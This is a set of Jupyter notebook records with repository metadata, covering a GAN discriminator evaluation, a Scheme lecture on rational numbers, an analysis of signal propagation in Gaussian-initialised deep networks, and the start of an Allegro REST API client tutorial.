"# orit_test = (label_test[:,0]/2+0.5)*168-84\n# back_ratio_test = (label_test[:,1]/2+0.5)*0.8037109375+0.167724609375\n# width_test = (label_test[:,2]/2+0.5)*0.8+2.7\n# amwv_ratio_test = (label_test[:,3]/2+0.5)*0.4866197183098592+0.06338028169014084\n\nfeatures[:, 0] = (features[:, 0] /2+0.5)*0.4866197183098592+0.06338028169014084\n\nfig, ax = plt.subplots(1, 1)\nfig.set_size_inches(6, 5, forward=True)\n\n# labels_cor includes: orientation, background_ratio, width, amplitude/wavelength ratio, after shifting to (-1, 1)\nax.scatter(amwv_ratio_test[test_img_no], features[:, 0]) \n# calc the trendline\nz3 = np.polyfit(amwv_ratio_test[test_img_no], features[:, 0], 1)\np3 = np.poly1d(z3)\nax.plot(amwv_ratio_test[test_img_no],p3(amwv_ratio_test[test_img_no]),\"r-\")\n# the line equation:\nprint (\"y=%.6fx+(%.6f)\"%(z3[0],z3[1]))\nax.set_xlabel(\"Amplitude/wavelength ratio inputted to D\")\nax.set_ylabel(\"Predicted amplitude/wavelength ratio by D\")\n#plt.savefig(network_dir +\"Mud facies ratio scatter of fake vs real.png\", dpi=200) \n",
"y=0.830203x+(0.089593)\n"
]
],
[
[
"#### Assess D with Simulated data\n*(1) Randomly Select global features data",
"_____no_output_____"
]
],
[
[
"print(plt_data_no)",
"500\n"
],
[
"# Generate latent vectors.\nlatents_plt = np.random.randn(plt_data_no, Gs.input_shapes[0][1]) # 1000 random latents *Gs.input_shapes[0][1:]=[None, 128] [None, 4]\n\nlabels_plt = labels_inspect[:plt_data_no, 2:3]\n\nwellfacies_plt = wellfacies_inspect[:plt_data_no]\n\n# Run the generator to produce a set of images.\nimages_plt = Gs.run(latents_plt, labels_plt, wellfacies_plt)\nimages_plt = np.where(images_plt< -0.7, -1, images_plt)\nimages_plt = np.where(images_plt> 0.3, 1, images_plt)\n\n_, features = D.run(images_plt)\n",
"_____no_output_____"
],
[
"plt.imshow(images_plt[0,0])",
"_____no_output_____"
],
[
"features[:, 0] = (features[:, 0] / 2 + 0.5) *0.4866197183098592+0.06338028169014084\n\nlabels_plt[:, 0] = (labels_plt[:, 0] / 2 + 0.5) *0.4866197183098592+0.06338028169014084\n\n\nfig, ax = plt.subplots(1, 1)\nfig.set_size_inches(6, 5, forward=True)\n\n\n# labels_cor includes: orientation, background_ratio, width, amplitude/wavelength ratio, after shifting to (-1, 1)\nax.scatter(labels_plt[:, 0], features[:, 0]) \n# calc the trendline\nz3 = np.polyfit(labels_plt[:, 0], features[:, 0], 1)\np3 = np.poly1d(z3)\nax.plot(labels_plt[:, 0],p3(labels_plt[:, 0]),\"r-\")\n# the line equation:\nprint (\"y=%.6fx+(%.6f)\"%(z3[0],z3[1]))\nax.set_xlabel(\"Amplitude/wavelength ratio inputted to D\")\nax.set_ylabel(\"Predicted amplitude/wavelength ratio by D\")\n#plt.savefig(network_dir +\"Mud facies ratio scatter of fake vs real.png\", dpi=200) ",
"y=0.820349x+(0.097468)\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb040e36565a52f99005729b8bcb2f217679a330 | 5,889 | ipynb | Jupyter Notebook | Lectures/Lec9.ipynb | Kausta/Comp200LN | 73b897501827bdb742f827dd8971b123cf9e12ec | [
"Apache-2.0"
] | 1 | 2019-01-08T14:36:55.000Z | 2019-01-08T14:36:55.000Z | Lectures/Lec9.ipynb | Kausta/Comp200LN | 73b897501827bdb742f827dd8971b123cf9e12ec | [
"Apache-2.0"
] | null | null | null | Lectures/Lec9.ipynb | Kausta/Comp200LN | 73b897501827bdb742f827dd8971b123cf9e12ec | [
"Apache-2.0"
] | null | null | null | 18.064417 | 101 | 0.42435 | [
[
[
"# Lec9 `#17/10/17`",
"_____no_output_____"
],
[
"## Examples",
"_____no_output_____"
],
[
"### Box and Pointer Examples\n\nTrivial examples of scheme representation, box and pointer diagram, and printed representation.",
"_____no_output_____"
],
[
"### HOP Examples\n",
"_____no_output_____"
],
[
"```scheme \n(define f (multiplier 3))\n(f 5) ; 15\n(f 3) ; 9\n```\nType of multiplier: Number -> (Number -> Number)\n\nType of f: Number -> Number\n",
"_____no_output_____"
]
],
[
[
"(define (multiplier n)\n (lambda (x) (* x n)))\n(define f (multiplier 3))\n(f 5)",
"_____no_output_____"
],
[
"(define (repeated f n)\n (lambda (x) \n (if (= n 0)\n x\n (f ((repeated f (- n 1)) x))\n )))\n(define (mul a b)\n ((repeated (lambda (x) (+ x a)) b) 0))\n(mul 3 4)",
"_____no_output_____"
],
[
"(define (exp a b)\n ((repeated (lambda (x) (* x a)) b) 1))\n(exp 2 4)",
"_____no_output_____"
]
],
[
[
"### Rational Numbers ",
"_____no_output_____"
],
[
"#### Interface\n\n```scheme\n(make-rat n d) ; Rational Number Object\n(numer obj) ; n\n(denom obj) ; d\n```",
"_____no_output_____"
]
],
[
[
"(define (+rat x y) ; x, y are rational numbers\n (make-rat (+ (* (numer x) (denom y)) \n (* (numer y) (denom x)))\n (* (denom x) (denom y))))",
"_____no_output_____"
],
[
"(define (*rat x y)\n (make-rat (* (numer x) (numer y))\n (* (denom x) (denom y))))",
"_____no_output_____"
]
],
[
[
"#### Implementation 1\n\n- Cons \n- Car\n- Cdr",
"_____no_output_____"
],
[
"#### Implementation 2\n\n- List\n- Car\n- Cadr",
"_____no_output_____"
]
],
[
[
"(define (make-rat x y) (cons x y))\n(define (numer x) (car x))\n(define (denom x) (cdr x))",
"_____no_output_____"
],
[
"(define a (make-rat 1 2))\n(define b (make-rat 1 4))\n(define c (+rat a b))\n(display (numer c)) (newline)\n(display (denom c))",
"6\n8"
]
],
[
[
"#### Simplification",
"_____no_output_____"
]
],
[
[
"(define (gcd a b) \n (if (= a 0)\n b\n (gcd (% b a) a)))",
"_____no_output_____"
],
[
"(define (make-rat x y) \n (cons (/ x (gcd x y))\n (/ y (gcd x y))))",
"_____no_output_____"
],
[
"(define c (+rat a b))\n(display (numer c)) (newline)\n(display (denom c))",
"3\n4"
],
[
"(define (make-rat x y) (cons x y))\n(define (numer x) (/ (car x) (gcd (car x) (cdr x))))\n(define (denom x) (/ (cdr x) (gcd (car x) (cdr x))))",
"_____no_output_____"
],
[
"(define c (+rat a b))\n(display (numer c)) (newline)\n(display (denom c))",
"3\n4"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb04227b0dc436857b4a6960bca48e6dba77399a | 419,363 | ipynb | Jupyter Notebook | Gaussian_Feedforward_Analysis.ipynb | ro-jefferson/entropy_dnn | 30a27684fefba5f056c199f64e22b0001742d936 | [
"MIT"
] | 6 | 2021-07-17T21:15:58.000Z | 2021-12-23T00:14:10.000Z | Gaussian_Feedforward_Analysis.ipynb | ro-jefferson/entropy_dnn | 30a27684fefba5f056c199f64e22b0001742d936 | [
"MIT"
] | null | null | null | Gaussian_Feedforward_Analysis.ipynb | ro-jefferson/entropy_dnn | 30a27684fefba5f056c199f64e22b0001742d936 | [
"MIT"
] | 2 | 2021-09-23T07:45:19.000Z | 2022-02-03T12:19:06.000Z | 529.498737 | 197,732 | 0.936539 | [
[
[
"# Gaussian feedforward -- analysis\nRo Jefferson<br>\nLast updated 2021-05-26\n\nThis is the companion notebook to \"Gaussian_Feedforward.ipynb\", and is designed to read and perform analysis on data generated by that notebook and stored in HDF5 format.\n\n**The user must specify** the `PATH_TO_DATA` (where the HDF5 files to be read are located) and the `PATH_TO_OUTPUT` (where any plots will be written) below.",
"_____no_output_____"
]
],
[
[
"# Numpy, scipy, and plotting:\nimport numpy as np\nfrom scipy.stats import norm # Gaussian fitting\nimport scipy.integrate as integrate # integration\nimport matplotlib.pyplot as plt # plotting\nimport seaborn as sns; sns.set() # nicer plotting\nimport pandas as pd # dataframe for use with seaborn\n\n# File i/o:\nimport pickle # for unpickling MNIST data\nimport gzip # for opening pickled MNIST data file\nimport h5py # HDF5\n\n# Miscellaneous:\nimport math\nimport random # random number generators\nimport re # regular expressions\nimport gc # garbage collection\n\n# symbolic algebra package:\nimport sympy as sym\nfrom sympy import tanh",
"_____no_output_____"
]
],
[
[
"## Import HDF5 data\nSpecify the path to the .hdf5 files containing the accuracies and hooks, and define functions to load the data as dictionaries:",
"_____no_output_____"
]
],
[
[
"PATH_TO_DATA = '/full/path/to/HDF5/data/'\nPATH_TO_OUTPUT = '/full/path/where/plots/are/to/be/saved/'\n\n# read file of accuracies, return dataset as dictionary:\ndef read_accuracies(file_name):\n with h5py.File(PATH_TO_DATA + file_name, 'r') as file:\n # cast elements as np.array, else returns closed file datasets:\n acc_dict = {key : np.array(file[key]) for key in file.keys()} \n \n return acc_dict\n\n\n# read file of inputs/outputs, return dataset as dictionary:\ndef read_hooks(file_name): \n with h5py.File(PATH_TO_DATA + file_name, 'r') as file:\n # cast elements as np.array, else returns closed file datasets:\n hook_dict = {key : np.array(file[key]) for key in file.keys()}\n \n return hook_dict\n\n\n# read file of weights, biases; return dataset as dictionary:\ndef read_parameters(file_name):\n with h5py.File(PATH_TO_DATA + file_name, 'r') as file:\n # cast elements as np.array, else returns closed file datasets:\n for key in file.keys():\n para_dict = {key : np.array(file[key]) for key in file.keys()} \n \n return para_dict\n\n\n# load data, ensuring consistent files:\ndef load_data(acc_file, hook_file, para_file, verbose=True):\n accuracies = read_accuracies(acc_file)\n hooks = read_hooks(hook_file)\n parameters = read_parameters(para_file)\n \n var_w = accuracies['var_weight'].item()\n var_b = accuracies['var_bias'].item()\n \n if var_w != hooks['var_weight'].item() or var_w != parameters['var_weight'].item():\n raise Exception('Weight variances do not match!')\n elif var_b != hooks['var_bias'].item() or var_b != parameters['var_bias'].item():\n raise Exception('Bias variances do not match!')\n \n # extract accuracies corresponding to depth in hook file:\n index = np.where(accuracies['depth'] == hooks['depth'])[0] # array of matches\n if index.size == 0: # empty array = no match\n raise Exception('No matching depth!')\n else:\n acc = accuracies['accuracies'][index[0]]\n \n \n print('Successfully loaded network with the following parameters:'\n '\\nDepth = {}\\nvar_w = {}\\nvar_b = {}\\n'.format(hooks['depth'].item(), var_w, var_b))\n \n # optionally print key lists:\n if verbose:\n print('Hook keys:\\n{}\\n'.format(hooks.keys()))\n print('Parameter keys:\\n{}\\n'.format(parameters.keys()))\n \n return acc, hooks, parameters",
"_____no_output_____"
]
],
[
[
"So, for example, we can read in files and extract the hyperparameters as follows:",
"_____no_output_____"
]
],
[
[
"accs, hooks, paras = load_data('acc-150-30.hdf5', 'e14-hooks-150-30.hdf5', 'e14-para-150-30.hdf5')\n\ndepth = hooks['depth'].item()\nvar_w = hooks['var_weight'].item()\nvar_b = hooks['var_bias'].item()",
"Successfully loaded network with the following parameters:\nDepth = 30\nvar_w = 1.5\nvar_b = 0.05\n\nHook keys:\ndict_keys(['depth', 'in-0', 'in-1', 'in-10', 'in-11', 'in-12', 'in-13', 'in-14', 'in-15', 'in-16', 'in-17', 'in-18', 'in-19', 'in-2', 'in-20', 'in-21', 'in-22', 'in-23', 'in-24', 'in-25', 'in-26', 'in-27', 'in-28', 'in-29', 'in-3', 'in-4', 'in-5', 'in-6', 'in-7', 'in-8', 'in-9', 'var_bias', 'var_weight'])\n\nParameter keys:\ndict_keys(['B0', 'B1', 'B10', 'B11', 'B12', 'B13', 'B14', 'B15', 'B16', 'B17', 'B18', 'B19', 'B2', 'B20', 'B21', 'B22', 'B23', 'B24', 'B25', 'B26', 'B27', 'B28', 'B29', 'B3', 'B4', 'B5', 'B6', 'B7', 'B8', 'B9', 'W0', 'W1', 'W10', 'W11', 'W12', 'W13', 'W14', 'W15', 'W16', 'W17', 'W18', 'W19', 'W2', 'W20', 'W21', 'W22', 'W23', 'W24', 'W25', 'W26', 'W27', 'W28', 'W29', 'W3', 'W4', 'W5', 'W6', 'W7', 'W8', 'W9', 'depth', 'var_bias', 'var_weight'])\n\n"
]
],
[
[
"## Analysis functions\nHere we'll define some useful functions for analyzing the results. To begin, let's write a simple function that returns the distribution of pre-/post-activations (i.e., inputs/outputs) for each layer, to see whether they remain Gaussian.",
"_____no_output_____"
]
],
[
[
"# return mean and variance for the layer, and optionally plot:\ndef view_layer(key, plot=False, truncate=1000):\n layer = hooks[key][-truncate:] # use last `truncate` samples, else excessive size\n sns.distplot(layer, fit=norm)\n if not plot: plt.close() # optionally suppress figure\n mean, std = norm.fit(layer)\n \n return mean, std**2\n\n# same, but accept layer as array:\ndef view_array(layer, plot=False):\n sns.distplot(layer, fit=norm)\n if not plot: plt.close() # optionally suppress figure\n mean, std = norm.fit(layer)\n \n return mean, std**2",
"_____no_output_____"
]
],
[
[
"Let's look at a few layers:",
"_____no_output_____"
]
],
[
[
"# current dataset corresponds to `wide` network option, so should remain Gaussian until the last couple layers:\nview_layer('in-0', True)\nview_layer('in-15', True)\nview_layer('in-27', True)\nview_layer('in-29', True) # only 10 neurons, don't expect Gaussian",
"_____no_output_____"
]
],
[
[
"Of chief importance is the fixed-point $q^*$. We can find the approximate value with the following process: first, we numerically evaluate the integral expression for $q^{\\ell+1}$ as a function of $q^{\\ell}$ for a grid of points. We can optionally use this to plot $q^{\\ell+1}$ and the unit slope, but all we really need is the nearest datapoint (in the aforementioned grid) to the intersection, which we find by identifying the index at which the difference between these two curves changes sign. Then, we apply linear interpolation to the corresponding line segments to approximate the precise value of the intersection.\n\nDenote the endpoints of the line segment with unit slope $(x_1, y_1=x_1)$ and $(x_2, y_2=x_2)$, and the endpoints of the segment of the $q$-curve $(x_3=x_1, y_3)$ and $(x_4=x_2, y_4)$. Then Cramer's rule reduces to the following expression for the intersection point $x=y$:\n\n\\begin{equation}\nx=\\frac{(x_1y_4-x_2y_3)}{(x_1-x_2)-(y_3-y_4)}\n\\end{equation}",
"_____no_output_____"
]
],
[
[
"# recursive expression for the variances, eq. (14) in my blog:\ndef next_q(q, var_w=1, var_b=0):\n integral = integrate.quad(lambda z: np.exp(-z**2/2)*np.tanh(np.sqrt(q)*z)**2, -np.inf, np.inf)[0]/np.sqrt(2*np.pi)\n return var_w*integral + var_b\n\n# compute q* given variances, and optionally plot q^{l+1} vs. q^l:\ndef find_qstar(var_weight, var_bias, plot = False, domain = 2): # check between 0 and domain\n # grid of points for numerical sampling:\n points = np.arange(0,domain,0.05)\n qnew = [next_q(q, var_weight, var_bias) for q in points]\n \n # find index (i.e., datapoint) at which difference between curves changes sign:\n flip = np.argwhere(np.diff(np.sign(qnew-points)))[0][0]\n \n # extract line segments which contain the intersection:\n seg1 = points[flip:flip+2]\n seg2 = qnew[flip:flip+2]\n\n # intersection point x=4 via Cramer's rule:\n qstar = (seg1[0]*seg2[1] - seg1[1]*seg2[0])/(seg1[0] - seg1[1] - seg2[0] + seg2[1])\n \n if plot:\n line_df = pd.DataFrame({'q_l': points, 'q_{l+1}': points})\n theory_df = pd.DataFrame({'q_l': points, 'q_{l+1}': qnew})\n sns.lineplot('q_l', 'q_{l+1}', data=theory_df, marker='o');\n sns.lineplot('q_l', 'q_{l+1}', data=line_df, marker='o');\n \n return qstar",
"_____no_output_____"
]
],
[
[
"For example, for the case above, we have:",
"_____no_output_____"
]
],
[
[
"qstar = find_qstar(var_w, var_b, plot=True)\nprint(qstar)",
"0.4174806682136245\n"
]
],
[
[
"Similarly, we would like to find the fixed point $\\rho^*$, which is found by numerically solving a similar recursion relation, and then applying the flip-interpolation strategy above:",
"_____no_output_____"
]
],
[
[
"# recursive expression for the Pearson correlation coefficient, eq. (23) in my blog:\ndef next_rho(rho, qstar, var_w=1, var_b=0):\n sq = np.sqrt(qstar)\n bound = np.inf # integration bound (should be np.inf)\n \n integral = integrate.dblquad(lambda x, y: np.exp(-x**2/2)*np.exp(-y**2/2)*np.tanh(sq*x)*np.tanh(sq*(rho*x+np.sqrt(1-rho**2)*y)),\n -bound, bound, lambda x: -bound, lambda x: bound)[0]/(2*np.pi)\n return (var_w*integral + var_b)/qstar\n\n\n# compute rho* given q*, variances; optionally plot rho^{l+1} vs. rho^l:\ndef find_rhostar(qstar, var_weight, var_bias, plot = False):\n # grid of points for numerical sampling:\n points = np.arange(0,1.01,0.05)\n rhonew = [next_rho(rho, qstar, var_weight, var_bias) for rho in points]\n\n # find index (i.e., datapoint) at which difference between curves changes sign:\n where = np.argwhere(np.diff(np.sign(rhonew-points)))\n if where.size == 0:\n rhostar = 1\n else:\n flip = np.argwhere(np.diff(np.sign(rhonew-points)))[0][0]\n\n # extract line segments which contain the intersection:\n seg1 = points[flip:flip+2]\n seg2 = rhonew[flip:flip+2]\n\n # intersection point x=4 via Cramer's rule:\n rhostar = (seg1[0]*seg2[1] - seg1[1]*seg2[0])/(seg1[0] - seg1[1] - seg2[0] + seg2[1])\n \n if plot:\n line_df = pd.DataFrame({'rho_l': points, 'rho_{l+1}': points})\n theory_df = pd.DataFrame({'rho_l': points, 'rho_{l+1}': rhonew})\n sns.lineplot('rho_l', 'rho_{l+1}', data=theory_df, marker='o');\n sns.lineplot('rho_l', 'rho_{l+1}', data=line_df, marker='o');\n \n return rhostar",
"_____no_output_____"
]
],
[
[
"For example, for the $q^*$ value and associated variances above, we have:",
"_____no_output_____"
]
],
[
[
"rhostar = find_rhostar(qstar, var_w, var_b, True)\nprint(rhostar)",
"1\n"
]
],
[
[
"With these values in hand, we can compute the theoretical correlation length, given by eq. (27) in my blog (which is eq. (9) in Schoenholz et al.):",
"_____no_output_____"
]
],
[
[
"# correlation length (for the Pearson correlation coefficient):\ndef correlation_length(rhostar, qstar, var_w=1):\n sq = np.sqrt(qstar)\n bound = 100 # integration bound (should be np.inf, but that causes overflow errors)\n \n integral = integrate.dblquad(lambda x, y: np.exp(-x**2/2)*np.exp(-y**2/2)*(1/np.cosh(sq*x))**2*(1/np.cosh(sq*(rhostar*x+np.sqrt(1-rhostar**2)*y))**2),\n -bound, bound, lambda x: -bound, lambda x: bound)[0]/(2*np.pi)\n return -1/np.log(var_w*integral)",
"_____no_output_____"
],
[
"correlation_length(rhostar, qstar, var_w)",
"_____no_output_____"
]
],
[
[
"# Probing fall-off\nTheoretically, we should be able to train deeper networks at criticality, and they should all fall-off based on the correlation length. To see how our networks behave, we'll write a function that reads-in a grid-worth of accuracy data (optionally plotting the individual accuracies), and another that uses this function to make the desired scatterplot:",
"_____no_output_____"
]
],
[
[
"# automatically read and plot accuracies from a series of files **with the same variances**:\ndef read_and_plot_accs(base, start, stop, step, plot=True, write=False):\n # file names in format acc-{base}-{dd}.hdf5\n filenames = ['acc-{}-{}.hdf5'.format(base, dd) for dd in range(start, stop, step)]\n \n #print('Reading {} files: {}\\n'.format(len(filenames), filenames))\n \n # get list of accuracies and corresponding depths:\n acc, depth = [], []\n for i in range(len(filenames)):\n # load data:\n acc_dict = read_accuracies(filenames[i]) \n \n acc.append(acc_dict['accuracies'])\n depth.append(acc_dict['depth'].item())\n\n # get variances from last file:\n var_w = acc_dict['var_weight'].item()\n var_b = acc_dict['var_bias'].item()\n \n if plot: \n #plt.rcParams['figure.figsize'] = [9, 6] # globally (!) adjust figure size \n \n # plot each series, labelled by depth:\n list_dict = {'L = {}'.format(dd) : pd.Series(acc[i])\n for i,dd in enumerate(depth)}\n df = pd.DataFrame(list_dict)\n acc_plot = df.plot()\n \n # format legend, title:\n acc_legend = acc_plot.legend(loc='upper left', bbox_to_anchor=(1,1))\n acc_plot.set_title('var_w = {}'.format(var_w)) # all var_w equal\n \n # optionally save plot as pdf:\n if write:\n plt.savefig(PATH_TO_OUTPUT+'plot-{}.pdf'.format(base), \n bbox_extra_artists=(acc_legend,), bbox_inches='tight')\n\n return acc, depth, var_w, var_b\n ",
"_____no_output_____"
],
[
"# read-in accuracies using pre-defined function above, and use this to\n# make scatterplot like fig. 5 in Schoenholz et al.:\ndef probe_falloff(base_list, start, stop, step, plot=True, write=False):\n # read accuracies, with plot suppressed:\n acc_list, dep_list, w_list, b_list = [], [], [], []\n for base in base_list:\n acc, dep, w, b = read_and_plot_accs(base, start, stop, step, False, False)\n \n # store final accuracy from run:\n acc_list.append([a[-1] for a in acc])\n \n # store list of depths, variances:\n dep_list.append(dep)\n w_list.append(w)\n b_list.append(b)\n \n # var_w gives x-values:\n x_vals = []\n for i in range(len(w_list)):\n # make len(acc_list[i]) copies of w_list[i]:\n x_vals.append([w_list[i]]*len(acc_list[i]))\n \n x_vals = np.array(x_vals).flatten()\n \n # depths give y-values:\n y_vals = np.array(dep_list).flatten()\n \n # accuracies give z-values (color):\n z_vals = np.array(acc_list).flatten()\n \n # optionally make scatterplot:\n if plot:\n scat_plot = plt.scatter(x_vals, y_vals, c=z_vals, cmap='rainbow', s=50)\n plt.colorbar(scat_plot) # add colorbar as legend\n \n # add title, axes labels:\n plt.title('var_b = {}'.format(b_list[0])) # all var_b equal\n plt.xlabel('var_w')\n plt.ylabel('depth')\n \n # optionally save plot as pdf:\n if write:\n # should all have same bias, so label with that:\n plt.savefig(PATH_TO_OUTPUT+'scatterplot-{}.pdf'.format(b_list[0]),)\n \n return x_vals, y_vals, z_vals, b_list",
"_____no_output_____"
],
[
"# read and plot:\nvar_list, dep_list, acc_list, b_list = probe_falloff([x for x in range(100,286,5)], 10, 70, 3, True, False)",
"_____no_output_____"
]
],
[
[
" How does this compare with the theoretical value of the correlation length? We can easily compute this using the $q^*$, $\\rho^*$, and `correlation_length` functions above:",
"_____no_output_____"
]
],
[
[
"# same range of var_w values as above, for given var_b:\ntest_w = np.arange(1.0, 2.86, 0.05)\ntest_b = 0.05\n\nqstar_test = [find_qstar(ww, test_b, False) for ww in test_w]\n#print('q* = ', qstar_test)\n\nrhostar_test = [find_rhostar(qq, ww, test_b, False) for qq, ww in zip(qstar_test, test_w)]\n#print('\\nrho* = {}\\n'.format(rhostar_test))\n\nxi_vals = np.array([correlation_length(rr, qq, ww) for rr,qq,ww in zip(rhostar_test,qstar_test,test_w)])",
"_____no_output_____"
]
],
[
[
"In principle this should never be negative, but the numerics are such that the integral can be greater than 1 near the critical point, which makes $\\xi<0$. Since we can't plot infinity, let's just replace this with double the largest positive value for visualization purposes:",
"_____no_output_____"
]
],
[
[
"neg_index = np.where(np.array(xi_vals) < 0)[0].item() # get index of negative value\nxis = np.copy(xi_vals)\nxis[neg_index] = 2*max(xi_vals)\n\nxi_df = pd.DataFrame({'var_w': test_w, 'xi': xis})\nxi_plot = sns.lineplot('var_w', 'xi', data=xi_df, marker='o');\nxi_plot.set_ylim(0,100);",
"_____no_output_____"
]
],
[
[
"This is fine, but it would be nice to overlay the theoretical curve on the grid:",
"_____no_output_____"
]
],
[
[
"# re-create and overlay above two plots:\ndef overlay_falloff(base_list, start, stop, step, write=False):\n # ************ load and process data for scatterplot: ************\n \n # read accuracies, with plot suppressed:\n acc_list, dep_list, w_list, b_list = [], [], [], []\n for base in base_list:\n acc, dep, w, b = read_and_plot_accs(base, start, stop, step, False, False)\n \n # store final accuracy from run:\n acc_list.append([a[-1] for a in acc])\n \n # store list of depths, variances:\n dep_list.append(dep)\n w_list.append(w)\n b_list.append(b)\n \n # var_w gives x-values:\n x_vals = []\n for i in range(len(w_list)):\n # make len(acc_list[i]) copies of w_list[i]:\n x_vals.append([w_list[i]]*len(acc_list[i]))\n \n x_vals = np.array(x_vals).flatten()\n \n # depths give y-values:\n y_vals = np.array(dep_list).flatten()\n \n # accuracies give z-values (color):\n z_vals = np.array(acc_list).flatten()\n \n # ************ process data for correlation length plot: ************\n \n qstar = [find_qstar(ww, b_list[0], False) for ww in w_list] # all biases equal, so just use first\n \n rhostar = [find_rhostar(qq, ww, b_list[0], False) for qq, ww in zip(qstar, w_list)]\n \n xi_vals = np.array([correlation_length(rr, qq, ww) for rr,qq,ww in zip(rhostar, qstar, w_list)]) \n\n # ensure no negative elements (see comment about numerics near critical point above):\n artificial_xi = 2*max(xi_vals) # overwrite negative values with this\n for i in range(xi_vals.size):\n if xi_vals[i] < 0:\n xi_vals[i] = artificial_xi\n \n # consider a few different multiples of the correlation length, for comparison with Schoenholz et al.:\n three_vals = [np.pi*xx for xx in xi_vals]\n six_vals = [2*np.pi*xx for xx in xi_vals]\n \n # ************ overlay correlation length plot on scatterplot: ************ \n \n # create combination figure:\n fig, ax1 = plt.subplots(figsize=(9,6))\n ax2 = ax1.twinx() # share x axis\n \n # make scatterplot:\n ax1.set_xlabel(r'$\\sigma_w^2$')\n ax1.set_ylabel('depth')\n scat_plot = ax1.scatter(x=x_vals, y=y_vals, c=z_vals, cmap='rainbow', s=120) # does not return Axes object!\n ax1.tick_params(axis='y')\n # truncate for cleaner visuals:\n ax1.set_ylim(min(y_vals)-1, max(y_vals)+1)\n ax1.set_xlim(min(w_list)-0.05, max(w_list)+0.05)\n # ax1.set_title('Optional title here')\n cbar = plt.colorbar(scat_plot, label='accuracy') # add colorbar as legend\n # control labels/ticks position colorbar:\n cbar.ax.yaxis.set_ticks_position('right')\n cbar.ax.yaxis.set_label_position('left')\n\n # overlay correlation length plot:\n xi_df = pd.DataFrame({'var_w': w_list, 'xi': xi_vals})\n ax2 = sns.lineplot('var_w', 'xi', data=xi_df, marker=None, color='black')\n # n.b., use None instead of False, else pdf still has white horizontal ticks\n \n xi3_df = pd.DataFrame({'var_w': w_list, 'xi': three_vals})\n sns.lineplot('var_w', 'xi', data=xi3_df, marker=None, color='grey')\n \n xi6_df = pd.DataFrame({'var_w': w_list, 'xi': six_vals})\n sns.lineplot('var_w', 'xi', data=xi6_df, marker=None, color='darkgrey')\n # n.b., darkgrey is *lighter* than grey, because what the fuck programmers\n \n # truncate to same range/domain:\n ax2.set_ylim(min(y_vals)-1, max(y_vals)+1)\n ax2.set_xlim(min(w_list)-0.05, max(w_list)+0.05)\n # turn off second labels, ticks, and grid:\n ax2.set_ylabel(None)\n ax2.grid(False)\n ax2.axis('off')\n\n # optionally save plot as pdf:\n if write:\n # should all have same bias, so label with that:\n plt.savefig(PATH_TO_OUTPUT+'scatterplot-{}.pdf'.format(b_list[0]),)\n \n return x_vals, y_vals, 
z_vals, b_list",
"_____no_output_____"
],
[
"overlay_falloff([x for x in range(100,286,5)], 10, 70, 3, xis, False);",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb04290b2c7c633fbadc32444972f983219bbf46 | 14,460 | ipynb | Jupyter Notebook | tutorial_RestApi.ipynb | xSzpo/pyAllegro | ad14e076785e05d798d7e75efff9024ac01bb839 | [
"MIT"
] | null | null | null | tutorial_RestApi.ipynb | xSzpo/pyAllegro | ad14e076785e05d798d7e75efff9024ac01bb839 | [
"MIT"
] | null | null | null | tutorial_RestApi.ipynb | xSzpo/pyAllegro | ad14e076785e05d798d7e75efff9024ac01bb839 | [
"MIT"
] | null | null | null | 32.714932 | 165 | 0.48527 | [
[
[
"# pyAllegro: WebApi",
"_____no_output_____"
],
[
"## Import package and setup credentials",
"_____no_output_____"
]
],
[
[
"from pyAllegro.api import AllegroRestApi",
"_____no_output_____"
],
[
"```\nRestApi = AllegroRestApi()\n#RestApi = AllegroRestApi(config_file_dir='/Users/xszpo/.allegroApiConfig')\n\nRestApi.credentials_set(\n appName='<credentials from allegro>',\n clientId='<credentials from allegro>',\n clientSecred='<credentials from allegro>',\n redirectUrl='http://localhost:8000'\n )\n```",
"_____no_output_____"
]
],
[
[
"## Get token",
"_____no_output_____"
]
],
[
[
"RestApi = AllegroRestApi()",
"_____no_output_____"
],
[
"RestApi.get_token()",
"_____no_output_____"
]
],
[
[
